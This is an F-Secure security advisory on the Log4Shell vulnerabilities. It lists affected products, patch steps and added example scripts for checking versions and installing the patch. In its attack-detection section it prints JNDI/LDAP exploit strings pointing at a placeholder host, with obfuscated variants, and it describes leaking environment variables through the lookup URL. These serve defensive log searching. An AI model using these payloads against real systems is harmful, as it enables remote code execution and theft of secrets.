Note: This article will be updated as more information becomes available. We recommend you check back from time to time.
Update 2021-12-22: F-Secure Policy Manager 15.30 has been released; it includes a revised Java Runtime Environment that addresses these issues without the need to patch. Customers are advised to upgrade to it at their earliest opportunity.
Background
During the early hours of 2021-12-10 (UTC+0), a vulnerability (CVE-2021-44228, commonly called Log4Shell) was announced in the widely used Apache Log4j Java logging library. This library is used by many software vendors and service providers globally as a standardized way of handling log messages within software.
Like many other organizations, F-Secure immediately began to investigate which of our services and products might be affected.
Additionally, on 2021-12-14 (UTC+0), a further vulnerability (CVE-2021-45046) was announced in the same library. Naturally, we are investigating this vulnerability too. We will update this page with more information as it becomes available.
What is the impact of the vulnerability
Log4j 2 evaluates lookup expressions such as ${jndi:...} that appear inside logged messages. An unauthenticated attacker who can get such a string into any input that ends up in a log entry (an HTTP header such as User-Agent, a username, a search term) can therefore cause the target system to fetch and execute code from a remote location controlled by the attacker, typically an LDAP or RMI server the attacker operates. The second stage - what the downloaded malicious code does next - is fully up to the attacker.
What F-Secure products are affected
We have identified that only the following F-Secure products are affected by vulnerability CVE-2021-44228:
- F-Secure Policy Manager
- Note: Only the Policy Manager Server component is affected. Standalone installations of Policy Manager Console are not affected.
- F-Secure Policy Manager Proxy
- F-Secure Endpoint Proxy
- F-Secure Elements Connector
- F-Secure Messaging Security Gateway
Other F-Secure products are NOT affected
Please read on to see what steps are needed to address these issues.
How to check my F-Secure Elements Connector
Update: Elements Connector has now been updated via its update channel to a fixed version, and there is no need to manually apply the patch.
To check whether you have the latest version, please check the following:
Linux/RPM:
Execute Command: rpm -qa f-secure-elements-connector
This will return something similar to: f-secure-elements-connector-21.49.96235-1.x86_64
Linux/DEB:
Execute Command: dpkg -l f-secure-elements-connector (use lower case L)
This will return something similar to: ii f-secure-elements-connector 21.49.96235
Windows:
Check the version in Windows "Apps and Features"
In all cases, if the version reported is 21.49.96235 or greater, you have the fixed version. Compare each dot-separated component as a number rather than comparing the whole version as a text string.
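The following script is an added example for automating the Linux check above; it is not F-Secure tooling. It pulls the version out of either the rpm or the dpkg output shown and compares it against 21.49.96235 component by component, because a plain text comparison misorders versions whose components have different lengths. The package name and the sample output lines are taken from this page; the function names and the exit codes are assumptions of the example.

```shell
#!/bin/sh
# Added example, not F-Secure tooling. Checks an F-Secure Elements Connector
# package version against the fixed version named in the advisory.

FIXED_VERSION="21.49.96235"   # first fixed version, from the advisory

# version_ge A B: return 0 if dotted version A >= B, 1 otherwise.
# Compared numerically per component. A text comparison would be wrong:
# "21.5.1" sorts after "21.49.96235" as a string but is the older build.
# Assumption: components are non-negative integers.
version_ge() {
    _a="$1."; _b="$2."
    while [ -n "$_a" ] || [ -n "$_b" ]; do
        _x="${_a%%.*}"; _a="${_a#*.}"
        _y="${_b%%.*}"; _b="${_b#*.}"
        [ "${_x:-0}" -gt "${_y:-0}" ] && return 0
        [ "${_x:-0}" -lt "${_y:-0}" ] && return 1
    done
    return 0
}

# connector_version: read "rpm -qa ..." or "dpkg -l ..." output on stdin and
# print the package version, e.g.
#   f-secure-elements-connector-21.49.96235-1.x86_64          -> 21.49.96235
#   ii  f-secure-elements-connector  21.49.96235  amd64 ...   -> 21.49.96235
connector_version() {
    sed -n 's/.*f-secure-elements-connector[- ]\{1,\}\([0-9][0-9.]*\).*/\1/p' | head -n 1
}

# connector_is_fixed: usage  rpm -qa f-secure-elements-connector | connector_is_fixed
# Exit 0 = fixed version installed, 1 = vulnerable version, 2 = package not found.
connector_is_fixed() {
    _v="$(connector_version)"
    if [ -z "$_v" ]; then
        echo "f-secure-elements-connector: package not found" >&2
        return 2
    fi
    if version_ge "$_v" "$FIXED_VERSION"; then
        echo "f-secure-elements-connector $_v: fixed (>= $FIXED_VERSION)"
        return 0
    fi
    echo "f-secure-elements-connector $_v: VULNERABLE, update to $FIXED_VERSION or later" >&2
    return 1
}
```

Pipe the package query into it, for example rpm -qa f-secure-elements-connector | connector_is_fixed, or the dpkg -l equivalent. The distinct exit codes let the same check run fleet-wide: 0 means fixed, 1 means an older build is installed, and 2 means the package is not present on that host at all, which should be investigated separately rather than counted as "fixed".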
How to patch my F-Secure Policy Manager / Policy Manager Proxy / Endpoint Proxy
Both Windows and Linux versions of these products should be considered affected.
Update: These products are not vulnerable to CVE-2021-45046, but must still be patched for CVE-2021-44228
Instructions are common for all the above products.
Note: the patch needs to be re-applied after a new installation or an upgrade, until fixed installers are available.
We have created a deployable security patch for this vulnerability. Please follow the steps below to patch your installations:
Note: The paths given below are suitable for an installation to the standard location. If you have chosen a custom path during installation, these will need to be adjusted accordingly.
- Download the patch from the F-Secure server
- Verify the SHA256 hash of the downloaded file before using it. It should be 64f7e4e1c6617447a24b0fe44ec7b4776883960cc42cc86be68c613d23ccd5e0; do not install a file whose hash differs.
- Stop the Policy Manager Server service
- Windows: net stop fsms
- Linux: Service name is fspms, the actual command to stop the service may vary with the operating system version. Refer to release notes.
- Copy the downloaded file to the correct location:
- For Windows the exact location depends on the product installed:
- Policy Manager, Policy Manager Proxy or F-Secure Endpoint Proxy
- C:\Program Files (x86)\F-Secure\Management Server 5\lib\
- Note: this is the only location where the patch is needed
- For Linux the location is simpler, as all affected products use the same:
- /opt/f-secure/fspms/lib
- Note: this is the only location where the patch is needed
- Start the Policy Manager Server service
- Linux: Service name is fspms, the actual command to start the service may vary with the operating system version. Refer to release notes.
- Windows: net start fsms
The patch is loaded automatically from the lib directory when the service starts.
Note: This patch applies to all versions of the affected software from 13.10 onwards. Customers using earlier versions than this MUST upgrade to the latest supported version, as their version is incompatible with the patch and versions below 14 are out of support.
Update: We have created an easy-to-use tool that verifies whether the patch has been applied. You can find it here.
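The patch steps above, as one added script for the Linux layout. This is an example written for this page, not F-Secure's patch tooling or its verification tool. It refuses to install a file whose SHA256 does not match the published value, checks that the lib directory exists before stopping anything, and takes the stop and start commands as parameters because the page says the real command varies by operating system version: the "service fspms stop/start" defaults are a placeholder assumption, and so is the choice of sha256sum, shasum or openssl, whichever the host has. The hash and the default path are the ones given above.

```shell
#!/bin/sh
# Added example, not F-Secure tooling: apply the Policy Manager / Policy Manager
# Proxy / Endpoint Proxy patch on Linux in the order the advisory gives.

PATCH_SHA256="64f7e4e1c6617447a24b0fe44ec7b4776883960cc42cc86be68c613d23ccd5e0"  # from the advisory
PM_LIBDIR="/opt/f-secure/fspms/lib"                                               # default Linux path

# sha256_of FILE: print the hex SHA-256, using whichever tool the host has.
sha256_of() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | cut -d' ' -f1
    elif command -v shasum >/dev/null 2>&1; then
        shasum -a 256 "$1" | cut -d' ' -f1
    else
        openssl dgst -sha256 "$1" | sed 's/.*= *//'
    fi
}

# sha256_matches FILE EXPECTED: 0 only if FILE hashes to EXPECTED
# (case-insensitive, so a hash pasted in upper case still verifies).
sha256_matches() {
    _actual="$(sha256_of "$1" | tr 'A-Z' 'a-z')"
    _expected="$(printf '%s' "$2" | tr 'A-Z' 'a-z')"
    [ -n "$_actual" ] && [ "$_actual" = "$_expected" ]
}

# install_patch PATCHFILE EXPECTED_SHA256 [LIBDIR] [STOP_CMD] [START_CMD]
# Assumption: "service fspms stop/start" is only a placeholder; the advisory
# says the real command depends on the OS version, so pass the documented one.
install_patch() {
    _patch="$1"; _expected="$2"; _libdir="${3:-$PM_LIBDIR}"
    _stop="${4:-service fspms stop}"; _start="${5:-service fspms start}"

    # 1. Integrity check first: never copy a file whose hash does not match.
    if ! sha256_matches "$_patch" "$_expected"; then
        echo "SHA256 mismatch for $_patch, refusing to install" >&2
        return 1
    fi
    # 2. The lib directory must exist; a custom install path needs LIBDIR set.
    if [ ! -d "$_libdir" ]; then
        echo "$_libdir does not exist (custom installation path?)" >&2
        return 1
    fi
    # 3. Stop the service, copy the patch into lib, start the service.
    $_stop || return 1
    cp "$_patch" "$_libdir/" || return 1
    $_start || return 1
    # 4. Post-check: the patch is picked up from LIBDIR when the service starts.
    [ -f "$_libdir/$(basename "$_patch")" ]
}
```

Run it as root against the downloaded file, for example install_patch /path/to/downloaded-patch "$PATCH_SHA256". Keep the note above in mind: after any later installation or upgrade the script has to be run again until fixed installers are in use.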
How to patch my F-Secure Messaging Security Gateway
In most cases, F-Secure has automatically patched the Messaging Security Gateway installations.
However, some customers may have configured the system to apply patches manually. In that case the administrator receives an email announcing the patch, and should apply it immediately.
The following patches have been released by F-Secure to address these vulnerabilities (each entry is the patch number followed by the Messaging Security Gateway version it applies to):
- 4312 8.17 Log4j (log4Shell) CVE-2021-44228 security fix
- 4311 8.15 Log4j (log4Shell) CVE-2021-44228 security fix
- 4310 8.16 Log4j (log4Shell) CVE-2021-44228 security fix
- 4309 8.13 Log4j (log4Shell) CVE-2021-44228 security fix
- 4308 8.13 Log4j (log4Shell) CVE-2021-44228 security fix
- 4307 8.13 Log4j (log4Shell) CVE-2021-44228 security fix
- 4303 8.12 Log4j (log4Shell) CVE-2021-44228 security fix
- 4302 8.13 Log4j (log4Shell) CVE-2021-44228 security fix
- 4301 8.13 Log4j (log4Shell) CVE-2021-44228 security fix
- 4300 8.15 Log4j (log4Shell) CVE-2021-44228 security fix
- 4299 8.14 Log4j (log4Shell) CVE-2021-44228 security fix
- 4298 8.13 Log4j (log4Shell) CVE-2021-44228 security fix
- 4295 8.13 Log4j (log4Shell) CVE-2021-44228 security fix
- 4294 8.17 Log4j (log4Shell) CVE-2021-44228 security fix
- 4293 8.16 Log4j (log4Shell) CVE-2021-44228 security fix
- 4291 8.18 Log4j (log4Shell) CVE-2021-44228 security fix
- 4290 8.18 Log4j (log4Shell) CVE-2021-44228 security fix
- 4257 8.18 CVE-2021-40438 Apache security fix
- 4256 8.17 CVE-2021-40438 Apache security fix
- 4255 8.16 CVE-2021-40438 Apache security fix
- 4254 8.13 CVE-2021-40438 Apache security fix
- 4335 8.15.00 Log4j (log4Shell) CVE-2021-45046 security fix
- 4334 8.16.02 Log4j (log4Shell) CVE-2021-45046 security fix
- 4333 8.12.04 Log4j (log4Shell) CVE-2021-45046 security fix
- 4332 8.13.10 Log4j (log4Shell) CVE-2021-45046 security fix
- 4331 8.13.06 Log4j (log4Shell) CVE-2021-45046 security fix
- 4330 8.15.02 Log4j (log4Shell) CVE-2021-45046 security fix
- 4329 8.14.02 Log4j (log4Shell) CVE-2021-45046 security fix
- 4328 8.13.14 Log4j (log4Shell) CVE-2021-45046 security fix
- 4327 8.13.08 Log4j (log4Shell) CVE-2021-45046 security fix
- 4326 8.13.20 Log4j (log4Shell) CVE-2021-45046 security fix
- 4325 8.13.18 Log4j (log4Shell) CVE-2021-45046 security fix
- 4324 8.17.04 Log4j (log4Shell) CVE-2021-45046 security fix
- 4323 8.16.04 Log4j (log4Shell) CVE-2021-45046 security fix
- 4322 8.13.22 Log4j (log4Shell) CVE-2021-45046 security fix
- 4321 8.18.02 Log4j (log4Shell) CVE-2021-45046 security fix
- 4320 8.18.00 Log4j (log4Shell) CVE-2021-45046 security fix
- 4313 8.13.14 Log4j (log4Shell) CVE-2021-44228 security fix
- 4336 8.17.02 Log4j (log4Shell) CVE-2021-45046 security fix
How to check if my F-Secure product has been attacked
Log files may help in detecting attack attempts. Please be aware that these are only examples; different entries may be relevant instead. The log files are rotated after they reach 15 megabytes, and 50 such rotated logs are kept, so on a busy server evidence of the earliest attempts may already have been rotated out. Copy the logs aside before you start searching them.
The relevant parts in the examples below are those related to "jndi" and "ldap".
Example from fspms-log4j-internal.log (Default: C:\Program Files (x86)\F-Secure\Management Server 5\logs\fspms-log4j-internal.log):
11.12.2021 09:43:23,525 INFO [log4jInternalLog] - [WARN] Error looking up JNDI resource [ldap://xxx.xxx.xxx.xxx:xxxx/abc].
11.12.2021 09:43:23,525 ERROR [log4jInternalLog] - log4j error
javax.naming.NamingException: LDAP connection has been closed
Example from request.log (Default: C:\Program Files (x86)\F-Secure\Management Server 5\logs\request.log):
0:0:0:0:0:0:0:1 - - [11/Dec/2021:07:49:38 +0100] "GET / HTTP/1.1" 200 1995 "-" "${jndi:ldap://xxx.xxx.xxx.xxx:xxxx/abc}" 0 "-" 3090 "-" "DONE"
It is not possible to give a full range of examples, as new variants of the exploit are constantly being created and they produce log messages that differ from the ones above.
The initial exploit attempts may also have been obfuscated, for example by writing ${jndi:...} as ${${lower:j}ndi:...} or by assembling the string from ${::-j}-style lookups. Some basic obfuscations can be undone with a regular expression, or by normalizing the string before matching. An example collection of useful searches can be found at https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b .
The second stage of the attack is fully dependent on what code is fetched from the remote location by the initial log4j exploit, and no general indicators of compromise can be singled out for it.
The attack may also leak environment variables from the targeted system. If the exploit string contains a lookup for such a variable (for example ${env:SOME_VARIABLE} embedded in the LDAP URL), log4j resolves the value and places it into the outgoing URL, so the secret reaches the attacker's server in the hostname or path of the request, or in the DNS query for that hostname, without any code being downloaded at all.
Note: After patching, jndi strings will still appear in request.log, as this particular log records all incoming requests. This is by design, as it is important that the Administrator can see all incoming requests. Such entries after patching indicate an attempt, not a successful exploitation.
What protection does F-Secure provide against this vulnerability
Our Endpoint Protection (EPP) is continuously updated with detections for the latest local exploit files, but given the many ways in which exploitation can happen, this only covers part of the problem.
EPP detections address any payload seen in the post-exploitation phase as usual, and at this point in time we have the following detections in place that address some serious attack scenarios. These represent malicious payloads that we have seen "in the wild" in connection with Log4j exploits.
- TR/Drop.Cobacis.AL
- TR/Rozena.wrdej
- TR/PShell.Agent.SWR
- TR/Coblat.G1
- TR/AD.MeterpreterSC.rywng
Many of these detections have been available in our EPP for months already, meaning that our customers are proactively protected from these kinds of payloads.
Other detections present may also help, as there are multiple ways to use the exploit. We will update the list of useful detections as the situation evolves.
Our Endpoint Detection and Response (EDR) capabilities are effective independently of this specific vulnerability: malicious activity, particularly post-exploitation activity, is detected as normal. We will keep adding new detections on the basis of what we see.
F-Secure Elements Vulnerability Management is being constantly updated to add detections, and we have a separate page detailing the current status. This will be updated as new detections are available.
Please also check the recommendations below in the following section.
What steps should you take in general (applies to all software, regardless of vendor)
Further Reading
Our F-Secure Consulting Incident Response team has also created a post with some additional information on the vulnerability.
Other useful links
SwitHak has created a useful page that collates various articles related to this vulnerability: https://gist.github.com/SwitHak/b66db3a06c2955a9cb71a8718970c592